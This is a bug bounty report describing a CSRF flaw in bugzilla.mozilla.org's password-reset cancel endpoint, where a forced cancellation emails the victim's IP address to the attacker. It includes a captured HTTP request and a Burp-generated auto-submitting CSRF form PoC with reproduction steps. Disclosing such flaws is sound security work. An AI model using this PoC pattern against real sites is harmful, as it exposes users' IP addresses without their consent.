#2 CSRF to Information disclosure on password cancel endpoint

## Summary: HI team, few month ago I found #2106662 ```CSRF to information disclosure vulnerability ``` and team resolved so I was testing then I got same vulnerability in https://bugzilla.mozilla.org/. when someone try to get password reset token so then if they will cancel password reset to they will get email notification and email contain victim IP address. so attacker can easly victim IP from cancellation process. It's low hanging security risk but it's significant for users. where attacker able to get victim IP, Address. This is disclosing users information. one click information disclosed. Suppose attacker create account on https://bugzilla.mozilla.org/ Now attacker knows the victim created also account on https://bugzilla.mozilla.org/. Now attacker create CSRF Payload using his own email. bcoz attacker knows the how password reset functionality works ( which contain the IP address.) now attacker send the malicious link to victim. REQUEST:- ```javascript POST /token.cgi HTTP/2 Host: bugzilla.mozilla.org Cookie: _ga=GA1.2.943165794.1724831061; _ga_PWTK27XVWP=GS1.1.1724884053.2.0.1724884053.0.0.0; _ga_MQ7767QQQW=GS1.1.1726224133.2.0.1726224133.0.0.0; _ga_B9CY1C9VBC=GS1.1.1727174575.2.1.1727174593.0.0.0; _gid=GA1.2.1127107875.1727130511 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 114 Origin: http://burpsuite Referer: http://burpsuite/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel ``` Convert to CSRF:- ```js <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://bugzilla.mozilla.org/token.cgi" method="POST"> <input type="hidden" name="cancel&#95;token" value="1727251240&#45;UxKc4U5ThgrHPhWNJ323&#45;fahjy5Pn05h5ZYb7OqG&#45;SI" /> <input type="hidden" name="t" value="3XOIDGIRtcwC3icniucOlm" /> <input type="hidden" name="a" value="cxlpw" /> <input type="hidden" name="cancel" value="Cancel" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ## Steps To Reproduce: 1. Create account https://bugzilla.mozilla.org/. and send password reset link on his own email. 2. Attacker open password cancel link and create CSRF Html link. 3. Send to victim and attacker got email Password change request canceled 4. When attacker open email so attacker got victim IP Address. See in this PoC Payload attacker will use own email. Bcoz when Victim click on that malicious link attacker will get victim Information on attacker email. ███ ## Impact ## Summary: Attacker can get Information of victim by sending a link to the Victim, which will contain the Victim's IP address.